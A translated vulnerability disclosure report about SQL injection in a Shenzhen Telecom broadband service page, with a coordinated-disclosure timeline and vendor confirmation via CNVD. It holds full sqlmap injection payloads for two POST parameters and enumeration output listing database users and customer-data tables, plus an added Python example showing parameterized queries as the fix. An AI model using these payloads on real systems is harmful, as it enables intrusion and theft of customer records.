2016-04-03: Details reported to the vendor; awaiting the vendor's handling
2016-04-06: Vendor confirmed; details disclosed only to the vendor
2016-04-16: Details disclosed to core white hats and experts in the relevant field
2016-04-26: Details disclosed to regular white hats
2016-05-06: Details disclosed to intern white hats
2016-05-21: Details disclosed to the public
Massive leak of sensitive information! ~~~ Includes accounts, ID card numbers, personal information, bank information, order information, enterprise information and more! ~~~
Multiple SQL injection points in the Shenzhen Telecom Broadband Service Center:
http://**.**.**.**/up/?login=yes (POST) name=111&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
Both the name and zjid parameters are injectable.
sqlmap identified the following injection points with a total of 155 HTTP(s) requests:
---
Place: POST
Parameter: zjid
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: name=111&zjid=-1221' OR 8367=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8367=8367) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'BQDy'='BQDy&Submit=%B5%C7%C2%BC%B2%E9%D1%AF

    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: name=111&zjid=2222' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(66)+CHAR(70)+CHAR(112)+CHAR(72)+CHAR(120)+CHAR(104)+CHAR(89)+CHAR(90)+CHAR(71)+CHAR(88)+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &Submit=%B5%C7%C2%BC%B2%E9%D1%AF

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: name=111&zjid=2222'; WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%E9%D1%AF

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: name=111&zjid=2222' WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%E9%D1%AF

Place: POST
Parameter: name
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: name=-6638' OR 3817=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (3817=3817) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'bWIg'='bWIg&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF

    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: name=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(116)+CHAR(71)+CHAR(81)+CHAR(65)+CHAR(104)+CHAR(103)+CHAR(105)+CHAR(86)+CHAR(110)+CHAR(86)+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: name=111'; WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: name=111' WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: name, type: Single quoted string (default)
[1] place: POST, parameter: zjid, type: Single quoted string
[q] Quit
> 0
[04:16:35] [INFO] testing Microsoft SQL Server
[04:16:35] [INFO] confirming Microsoft SQL Server
[04:16:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
[04:16:38] [INFO] fetching current user
current user: 'hds0270595'
[04:16:39] [INFO] fetching current database
current database: 'hds0270595_db'
[04:16:40] [INFO] testing if current user is DBA
current user is DBA: False
database management system users [2]:
[*] hds0270595
[*] sa_hds027adm
available databases [3]:
[*] hds0270595_db
[*] master
[*] tempdb
Database: hds0270595_db
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.dingdan       | 77035   | orders
| dbo.dxyonghu      | 40942   | telecom users
| dbo.tvdingdan     | 18960   | TV orders
| dbo.xsdingdan     | 15531   | student orders
| dbo.dkjl          | 13307   | payment records
| dbo.quyu          | 8813    | regions
| dbo.cdma          | 7063    | cdma
| dbo.tvyonghu      | 5844    | TV users
| dbo.qydingdan     | 1721    | enterprise orders
| dbo.zhangbu       | 1080    | account books
| dbo.zhdingdan     | 1043    | ? orders
| dbo.yybb          | 1031    |
| dbo.xydingdan     | 943     | credit orders?
| dbo.rizi          | 908     | days
| dbo.bankmx        | 771     | bank details
| dbo.telbook       | 605     | phone book
| dbo.caigou        | 210     | purchasing
| dbo.mingxi        | 174     | details
| dbo.dxtaocan      | 128     | telecom packages
| dbo.wcdma         | 87      | wcdma
| dbo.taocan        | 78      | packages
| dbo.tvtaocan      | 64      | TV packages
| dbo.yuangong      | 48      | employees
| dbo.chanpin       | 43      |
| dbo.dxwapchanping | 33      |
| dbo.dxwapchanping | 33      |
| dbo.caidan        | 32      |
| dbo.tvdz          | 21      |
| dbo.tvwapchanping | 13      |
| dbo.tvwapchanping | 13      |
| dbo.modem         | 10      |
| dbo.dls           | 4       | agents?
| dbo.ywqx          | 4       |
| dbo.zu_yuangong   | 3       | group employees?
| dbo.config        | 1       |
+-------------------+---------+
As above.
Filter the inputs.
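Filtering alone is fragile; the durable fix for the name and zjid lookup is to bind both values as query parameters. The following is an added example, not code from the report or from the vendor's site: it stands in for the page's ASP lookup with an in-memory SQLite table (constructed sample rows; the table name dxyonghu is borrowed from the report) and shows the concatenated query returning extra rows and leaking a database error, while the parameterized query treats the same inputs as plain data.

```python
import sqlite3

# Constructed stand-in for the report's dxyonghu (telecom user) table.
# The real backend is MSSQL 2008 behind an ASP page; SQLite is used here
# only so the example runs offline. The rows are made up.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dxyonghu (name TEXT, zjid TEXT, phone TEXT)")
    conn.executemany("INSERT INTO dxyonghu VALUES (?, ?, ?)", [
        ("111", "2222", "0755-0000001"),
        ("222", "3333", "0755-0000002"),
    ])
    return conn

def lookup_vulnerable(conn, name, zjid):
    # The broken pattern: request values spliced into the SQL text, so a
    # quote inside zjid closes the literal and the rest is parsed as SQL.
    sql = ("SELECT name, zjid, phone FROM dxyonghu "
           f"WHERE name='{name}' AND zjid='{zjid}'")
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, name, zjid):
    # The fix: bound parameters; the driver never interprets the values as SQL.
    sql = "SELECT name, zjid, phone FROM dxyonghu WHERE name=? AND zjid=?"
    return conn.execute(sql, (name, zjid)).fetchall()

def run(fn, conn, name, zjid):
    # Return the rows, or the exception class name when the query fails
    # (the error channel that sqlmap's error-based tests rely on).
    try:
        return fn(conn, name, zjid)
    except sqlite3.Error as e:
        return type(e).__name__

def demo():
    conn = make_db()
    # Two inputs with the same shape as the report's zjid payloads: a
    # tautology that widens the WHERE clause, and a CONVERT() call that
    # this dialect does not know and therefore turns into a database error.
    tautology = "x' OR 'a'='a"
    err_probe = "2222' AND 1=CONVERT(INT,'a')--"
    return {
        "legit_vuln": run(lookup_vulnerable, conn, "111", "2222"),
        "legit_safe": run(lookup_parameterized, conn, "111", "2222"),
        "tautology_vuln": run(lookup_vulnerable, conn, "111", tautology),
        "tautology_safe": run(lookup_parameterized, conn, "111", tautology),
        "error_vuln": run(lookup_vulnerable, conn, "111", err_probe),
        "error_safe": run(lookup_parameterized, conn, "111", err_probe),
    }
```

Running demo() shows the concatenated version returning both rows for the tautology and raising for the CONVERT probe, while the parameterized version returns only the matching row for legitimate input and nothing for either payload.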
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-04-06 14:05
CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to China Telecom Group, which will coordinate follow-up handling with the website's management department.
None for now.
City telecom? = =!
They say that reports with a prefix, like mine, get a higher score.